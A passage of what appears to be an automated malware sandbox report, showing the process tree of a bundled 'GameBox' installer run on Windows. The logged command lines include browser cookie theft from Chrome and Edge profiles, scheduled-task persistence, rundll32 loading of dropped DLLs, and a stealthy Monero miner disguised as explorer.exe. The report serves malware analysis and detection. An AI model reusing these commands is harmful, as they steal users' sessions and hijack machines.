                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7740
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                      schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8748
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                          PID:2928
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                        PID:5272
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 704
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 672
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:352
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7UAAI.tmp\DJCJOECZVtp5ltvQQsObO2H9.tmp
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7UAAI.tmp\DJCJOECZVtp5ltvQQsObO2H9.tmp" /SL5="$50206,138429,56832,C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe"
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                    PID:4640
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-H6E57.tmp\Setup.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-H6E57.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                      PID:804
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                        PID:4684
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628400241 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5260
                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                          PID:4952
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4848
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6296
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6724
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7024
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:5204
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  PID:5292
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8360116.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8360116.exe"
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:6608
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 6608 -s 2440
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1197537.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1197537.exe"
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:6628
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5463260.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5463260.exe"
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                    PID:6620
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7148
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8054769.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8054769.exe"
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      PID:6668
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                    PID:5804
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628400241 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7664
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe" /SpecialRun 4101d8 3788
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                  PID:2344
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4963167.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4963167.exe"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                  PID:2984
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2984 -s 2476
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                    PID:4396
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1063322.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1063322.exe"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                  PID:5436
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-S1BTI.tmp\GameBoxWin32.tmp
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S1BTI.tmp\GameBoxWin32.tmp" /SL5="$402F4,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-A879D.tmp\Daldoula.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-A879D.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                    PID:5288
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T7NHH.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T7NHH.tmp\ultramediaburner.tmp" /SL5="$702A8,281924,62464,C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                        PID:5572
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4184
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b6-95a11-c99-dcfb0-48764c0718133\Lokajafaha.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\b6-95a11-c99-dcfb0-48764c0718133\Lokajafaha.exe"
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                        PID:6100
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\34-e0d3c-c7d-f96ae-f99b46323ecbc\Xofybexazhe.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\34-e0d3c-c7d-f96ae-f99b46323ecbc\Xofybexazhe.exe"
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5420
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nilhnvks.zzk\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7232
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7416
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\EBOOKE~1.TMP,S C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\ebook.exe
                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7780
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\czpbfbdw.3u4\EBOOKE~1.TMP,rl9PWQ==
                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8096
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7544
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\npaioguv.tb4\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6088
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7796
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\cbi0cjkw.rdp\JoSetp.exe
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7272
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7288
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2204
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5772
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5472
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5860
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4784
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8204
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\JoSetp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4292
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3336179.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3336179.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5716
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6345772.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6345772.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 7896 -s 2424
                                                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4916
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7044040.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7044040.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8112
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6432
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
